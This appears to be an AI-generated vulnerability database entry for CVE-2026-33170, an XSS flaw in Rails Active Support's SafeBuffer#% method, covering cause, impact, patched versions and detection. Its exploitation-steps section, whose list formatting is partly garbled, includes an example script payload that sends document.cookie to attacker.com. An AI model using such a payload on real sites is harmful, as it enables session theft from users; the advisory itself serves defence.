
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33170 is a Cross-Site Scripting (XSS) vulnerability in the Active Support component of Ruby on Rails, specifically in the SafeBuffer#% method. The flaw was responsibly disclosed by researcher @ch4n3-yoon and published on March 23, 2026. It affects all Rails versions prior to 7.2.3.1, versions 8.0.0 through 8.0.4.1 (exclusive), and versions 8.1.0 through 8.1.2.1 (exclusive). The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.3 (Medium) (GitHub Advisory, Feedly).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). In Active Support's SafeBuffer class, the #% formatting operator creates a new buffer but fails to propagate the @html_unsafe flag from the source buffer to the newly created one. When a SafeBuffer is mutated in-place (e.g., via gsub!), the mutation correctly marks the buffer as unsafe; however, if that unsafe buffer is subsequently formatted using % with untrusted user-supplied arguments, the resulting buffer incorrectly reports html_safe? == true. This causes ERB's auto-escaping mechanism to skip HTML encoding of the output, allowing unescaped malicious content to be rendered in the browser. The fix, applied across three patch commits, ensures the @html_unsafe flag is explicitly propagated to the new buffer created by #% (GitHub Advisory, Patch Commit).
Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim user's browser session, bypassing Rails' built-in ERB auto-escaping protections. The primary impacts are to confidentiality (e.g., session token theft, credential harvesting) and integrity (e.g., DOM manipulation, phishing content injection), with no direct availability impact. Exploitation requires user interaction — a victim must visit or be directed to a page rendering the maliciously crafted content — and the scope is changed, meaning the attacker can affect resources beyond the vulnerable application itself. Downstream IBM products including Aspera Faspex, Aspera Shares, Aspera Enterprise WebApps, CloudPak for AIOps, and License Metric Tool are also affected (GitHub Advisory, IBM Aspera Faspex).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.018% (0.000180), indicating a very low probability of exploitation in the near term. Exploitation requires a specific code pattern — in-place mutation of a SafeBuffer followed by % formatting with attacker-controlled input — which limits the attack surface to applications using this particular combination.
SafeBuffer mutation followed by % formatting.SafeBuffer is mutated in-place (e.g., buffer.gsub!(pattern, replacement)) and then formatted with % using user-controlled data (e.g., buffer % { name: user_input }).<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.% formatting call.html_safe? incorrectly returns true, ERB skips escaping and the script executes in the victim's browser, enabling session hijacking, credential theft, or further attacks (GitHub Advisory, Patch Commit).<script>, onerror=, onload=) in request parameters that are subsequently reflected in HTTP responses.Referer headers in external requests originating from the application's domain.<, >, ") in fields that should be HTML-encoded; unexpected JavaScript execution reported by browser security tools or Content Security Policy (CSP) violation reports.The primary remediation is to upgrade Rails Active Support to one of the patched versions: 7.2.3.1, 8.0.4.1, or 8.1.2.1, all released on March 23, 2026 (Rails Release, GitHub Advisory). For systems that cannot be immediately updated, apply strict input validation and additional output encoding as defense-in-depth measures, and audit application code for patterns that mutate SafeBuffer objects in-place (via gsub!, sub!, etc.) followed by % formatting with user-supplied data. IBM has released separate security bulletins for affected products including Aspera Faspex, Aspera Shares, Aspera Enterprise WebApps, CloudPak for AIOps, and License Metric Tool (IBM Aspera Faspex).
The Rails core team published an official release announcement and security advisory on March 23, 2026, crediting researcher @ch4n3-yoon for responsible disclosure (GitHub Advisory, Rails Blog). The vulnerability was rated "Low" severity by the Rails team in their advisory, though NVD and Red Hat assigned it a Medium CVSS score. IBM subsequently issued multiple security bulletins for downstream products affected by this dependency, indicating broad ecosystem impact (IBM Aspera Faspex).
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."